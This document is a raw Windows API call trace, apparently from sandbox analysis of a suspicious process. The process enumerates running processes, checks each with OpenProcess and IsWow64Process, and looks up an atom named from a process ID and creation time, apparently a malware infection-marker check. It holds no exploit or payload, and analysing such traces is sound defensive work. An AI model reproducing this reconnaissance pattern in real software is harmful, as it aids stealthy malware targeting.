	[0075.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0075.452] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.452] CloseHandle (hObject=0x224) returned 1
	[0075.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728858, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0075.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0075.452] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.452] CloseHandle (hObject=0x224) returned 1
	[0075.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea90, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0075.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0075.452] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.452] CloseHandle (hObject=0x224) returned 1
	[0075.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0075.453] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.453] CloseHandle (hObject=0x224) returned 1
	[0075.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0075.453] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.453] CloseHandle (hObject=0x224) returned 1
	[0075.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0075.453] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.453] CloseHandle (hObject=0x224) returned 1
	[0075.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0075.453] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.453] CloseHandle (hObject=0x224) returned 1
	[0075.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0075.454] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.454] CloseHandle (hObject=0x224) returned 1
	[0075.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0075.454] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.454] CloseHandle (hObject=0x224) returned 1
	[0075.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0075.454] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.454] CloseHandle (hObject=0x224) returned 1
	[0075.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e888, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0075.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0075.454] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.454] CloseHandle (hObject=0x224) returned 1
	[0075.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0075.454] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.455] CloseHandle (hObject=0x224) returned 1
	[0075.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0075.455] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.455] CloseHandle (hObject=0x224) returned 1
	[0075.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0075.455] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.455] CloseHandle (hObject=0x224) returned 1
	[0075.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0075.455] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.455] CloseHandle (hObject=0x224) returned 1
	[0075.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0075.455] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.455] CloseHandle (hObject=0x224) returned 1
	[0075.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb30, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.456] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.456] CloseHandle (hObject=0x224) returned 1
	[0075.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb58, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.456] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.456] CloseHandle (hObject=0x224) returned 1
	[0075.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.456] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetLastError () returned 0x5
	[0075.457] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.457] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.457] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.458] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.459] GetLastError () returned 0x5
	[0075.460] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.460] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.460] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.460] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.460] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.460] CloseHandle (hObject=0x224) returned 1
	[0075.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.460] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.460] CloseHandle (hObject=0x224) returned 1
	[0075.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e770, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.460] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.461] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.461] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.461] CloseHandle (hObject=0x224) returned 1
	[0075.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c78) returned 0xc0000004
	[0075.500] VirtualAlloc (lpAddress=0x0, dwSize=0x16d78, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d78, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
